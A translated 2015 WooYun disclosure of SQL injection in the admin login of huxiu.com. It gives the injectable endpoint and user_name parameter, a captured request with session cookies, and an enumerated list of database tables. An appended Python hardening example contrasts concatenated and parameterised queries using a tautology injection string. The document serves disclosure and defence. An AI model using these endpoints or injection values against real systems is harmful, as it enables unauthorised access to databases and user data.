
Vulnerability summary

Defect ID: wooyun-2015-0101494

Title: Bypassing huxiu.com's protection to continue SQL injection

Vendor: huxiu.com

Author: 忽然之间

Submitted: 2015-03-15 14:56

Fixed: 2015-04-29 14:56

Disclosed: 2015-04-29 14:56

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-03-15: Details sent to the vendor, awaiting the vendor's handling
2015-03-17: Vendor confirmed; details disclosed to the vendor only
2015-03-27: Details disclosed to core white hats and experts in the relevant field
2015-04-06: Details disclosed to regular white hats
2015-04-16: Details disclosed to intern white hats
2015-04-29: Details disclosed to the public

Brief description:

Bypass huxiu.com's protection and continue SQL injection

Detailed description:

The huxiu.com subdomain admin.huxiu.com has SQL injection in the user_name parameter of the login request.
The server applies filtering, which has to be bypassed in order to inject.

Proof of concept:

POST /index.php/admin/main/login HTTP/1.1
Host: admin.huxiu.com
Proxy-Connection: keep-alive
Content-Length: 165
Accept: */*
Origin: http://admin.huxiu.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://admin.huxiu.com/index.php/admin/login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_324368ef52596457d064ca5db8c6618e=1426394622; Hm_lpvt_324368ef52596457d064ca5db8c6618e=1426394727; ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22dbd72051923fe0121a697a6c1f9414a2%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%2210.159.61.47%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A108%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2272.89+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1426395425%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D8ac73fae6469f57f51d54c1808a3ac57; SERVERID=d5442411194bb4b166c206297d72843f|1426395425|1426394627; cc=20150117763f0f7217ccd794c627a999a98f2a52
opt=ajax&user_name=admin&user_pass=admin
Injected parameter: user_name (the protection was bypassed by encoding the input)
Database: huxiuen
[161 tables]
+---------------------------------------
| pre_aid_tagid
| pre_article_att*****me*****nt
| pre_article_a*****nt_2*****101bak
| pre_article_block
| pre_article_block_item
| pre_article_books_info
| pre_article_books_info_url
| pre_article_category
| pre_article_comments
| pre_article_comments_recomment
| pre_article_comments_recomment_bak
| pre_article_content
| pre_article_content_20141101bak
| pre_article_content_20150127_bak
| pre_article_count
| pre_article_edit_log
| pre_article_edit_log_20141101bak
| pre_article_products_info
| pre_article_products_info_20141101bak
| pre_article_related
| pre_article_title
| pre_article_title_20141101bak
| pre_article_view_log
| pre_common_block
| pre_common_block_item
| pre_common_block_item_data
| pre_common_credit_log_20141101bak
| pre_common_credit_rule
| pre_common_friendlink
| pre_common_member
| pre_common_member_profile
| pre_common_member_status
| pre_common_report
| pre_common_setting
| pre_common_syscache
| pre_common_tag
| pre_common_tagitem
| pre_common_tools_share
| pre_email_list
| pre_forum_post_bak
| pre_forum_thread
| pre_group_categories
| pre_group_comments
| pre_group_forums
| pre_group_masters
| pre_group_notifications
| pre_group_section_apply
| pre_group_tags
| pre_group_tags_relation
| pre_group_zan_log
| pre_home_clickuser
| pre_home_favorite
| pre_home_notification
| pre_huxiu_activity
| pre_huxiu_ad
| pre_huxiu_aliyun_search_log
| pre_huxiu_annual_address
| pre_huxiu_anthology
| pre_huxiu_anthology_article
| pre_huxiu_anthology_comment
| pre_huxiu_anthology_count
| pre_huxiu_anthology_like_result
| pre_huxiu_anthology_subscription
| pre_huxiu_anthology_tagid
| pre_huxiu_article_draft_content
| pre_huxiu_article_draft_title
| pre_huxiu_article_ignore
| pre_huxiu_article_reason
| pre_huxiu_article_view_count
| pre_huxiu_author
| pre_huxiu_blessing
| pre_huxiu_credits_log
| pre_huxiu_data_alexa
| pre_huxiu_data_app
| pre_huxiu_data_weixin_aritlce
| pre_huxiu_data_weixin_user
| pre_huxiu_data_zhaoping
| pre_huxiu_fm_qrcode
| pre_huxiu_fm_qrcode_201409
| pre_huxiu_fm_qrcode_201502
| pre_huxiu_huodong
| pre_huxiu_huodong_baoming
| pre_huxiu_huodong_comment
| pre_huxiu_huodong_comments_recomment
| pre_huxiu_huodong_data
| pre_huxiu_huodong_view_log
| pre_huxiu_jinju
| pre_huxiu_jubao
| pre_huxiu_jubaodata
| pre_huxiu_jumpto_log
| pre_huxiu_l*****g*****_company
| pre_huxiu_l*****g*****_job
| pre_huxiu_later_read
| pre_huxiu_qr_tickets
| pre_huxiu_status_info
| pre_huxiu_tag
| pre_huxiu_tagitem
| pre_huxiu_weixin_share
| pre_huxiu_word_backlist
| pre_huxiu_word_backlist_log
| pre_huxiu_xiuping
| pre_liepin_jobs
| pre_maidian
| pre_mobile_baidu
| pre_open_ad
| pre_open_article
| pre_open_cooperator
| pre_open_group
| pre_open_purview
| pre_open_user
| pre_open_user_group
| pre_q*****n*****u_aid
| pre_shop_cart
| pre_shop_goods
| pre_shop_order
| pre_shop_order_detail
| pre_shop_ticket
| pre_sina_weibo_comment
| pre_sonos_data
| pre_tags
| pre_user_sub_tags
| pre_ww***_game
| pre_w***_game_ask
| pre_w***n_game_user
| pre_w***_huche_keywords
| pre_w***_lottery
| pre_w***_msg
| pre_w***_msg_event
| pre_w***_msg_image
| pre_w***_msg_link
| pre_w***_msg_location
| pre_w***n_msg_text
| pre_w***_msg_video
| pre_w***_msg_voice
| pre_w***_server_msg_event
| pre_w***_server_msg_history
| pre_w***_server_msg_image
| pre_ww***n_server_msg_link
| pre_w***n_server_msg_location
| pre_w***_server_msg_text
| pre_w***n_server_msg_video
| pre_w***n_server_msg_voice
| pre_w***_server_user_stat
| pre_w***_user_stat
| pre_*****us*****_poll
| pre_x***_poll_item
| pre_x**oll_option
| pre_x***_poll_profile
| pre_x***_poll_result
| pre_x***s_vote
| pre_x***ss_vote_choice
| pre_x***s_vote_field
| pre_x***s_vote_value
| pre_*****w*****_bind_info
| pre_*****w*****_bind_thread
| pre_*****w*****_session
| pre_*****w*****_temp
| pre_zhuanti
| pre_zhuanti_comment
| pre_zhuanti_extend
| pre_zhuanti_fenlei
The database was not dumped; please check it yourself.

Remediation:

Please strengthen the filtering policy.

Copyright notice: when reposting, please credit 忽然之间@乌云
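The remediation asks only for stronger filtering, but a filter in front of a query that splices the user_name field into SQL text can always be bypassed by some encoding of the input, which is exactly what this report describes. The durable fix is to bind the request fields as query parameters so they are sent as data and cannot change the statement's structure. The example below is added here and is not code from the report or from the huxiu.com application; the admin_user table, its columns and the password-hashing scheme are assumptions made for the demonstration. It puts the concatenating lookup next to the parameterised one so the difference on a crafted input is visible.

```python
import hashlib
import hmac
import os
import sqlite3

# Iteration count for PBKDF2; raise it as hardware permits.
PBKDF2_ROUNDS = 100_000


def hash_password(password: str, salt: bytes) -> bytes:
    """Derive a fixed-length hash from the password with PBKDF2-HMAC-SHA256."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the admin user table.

    Table and column names are assumptions for this example, not the
    names used by the huxiu.com application.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE admin_user ("
        " id INTEGER PRIMARY KEY,"
        " user_name TEXT UNIQUE NOT NULL,"
        " pass_salt BLOB NOT NULL,"
        " pass_hash BLOB NOT NULL)"
    )
    salt = os.urandom(16)
    conn.execute(
        "INSERT INTO admin_user (user_name, pass_salt, pass_hash) VALUES (?, ?, ?)",
        ("admin", salt, hash_password("correct horse battery", salt)),
    )
    conn.commit()
    return conn


def lookup_user_vulnerable(conn: sqlite3.Connection, user_name: str):
    """The pattern behind the report: the request field is spliced into SQL text.

    A blacklist placed in front of this only inspects the text; the text still
    becomes part of the statement, which is why an encoding the filter does not
    recognise gets past it.
    """
    sql = "SELECT id, pass_salt, pass_hash FROM admin_user WHERE user_name = '%s'" % user_name
    return conn.execute(sql).fetchone()


def lookup_user_safe(conn: sqlite3.Connection, user_name: str):
    """Hardened form: the value is bound as a parameter.

    The driver passes it as data, so quotes, comment sequences or any encoding
    of them cannot alter the statement; no blacklist is needed for that.
    """
    sql = "SELECT id, pass_salt, pass_hash FROM admin_user WHERE user_name = ?"
    return conn.execute(sql, (user_name,)).fetchone()


def login(conn: sqlite3.Connection, user_name: str, user_pass: str) -> bool:
    """Authenticate with the safe lookup and a constant-time hash comparison."""
    row = lookup_user_safe(conn, user_name)
    if row is None:
        return False
    _id, salt, stored = row
    return hmac.compare_digest(hash_password(user_pass, salt), stored)


if __name__ == "__main__":
    db = make_db()
    # Constructed input: a name no account has, carrying a quote and a tautology.
    # The concatenating lookup returns the admin row for it; the parameterised
    # lookup returns nothing.
    crafted = "nobody' OR '1'='1"
    print("vulnerable lookup found a row:", lookup_user_vulnerable(db, crafted) is not None)  # True
    print("safe lookup found a row:", lookup_user_safe(db, crafted) is not None)              # False
    print("login admin / correct password:", login(db, "admin", "correct horse battery"))     # True
    print("login admin / admin:", login(db, "admin", "admin"))                                 # False
```

The keyword filter the report mentions can stay as a secondary, monitoring-oriented control (a hit on the login endpoint is worth alerting on), but it should not be the control that decides whether the query is safe.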


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed at: 2015-03-17 12:14

Vendor reply:

Thanks to the white hat for the reminder.

Latest status:

None yet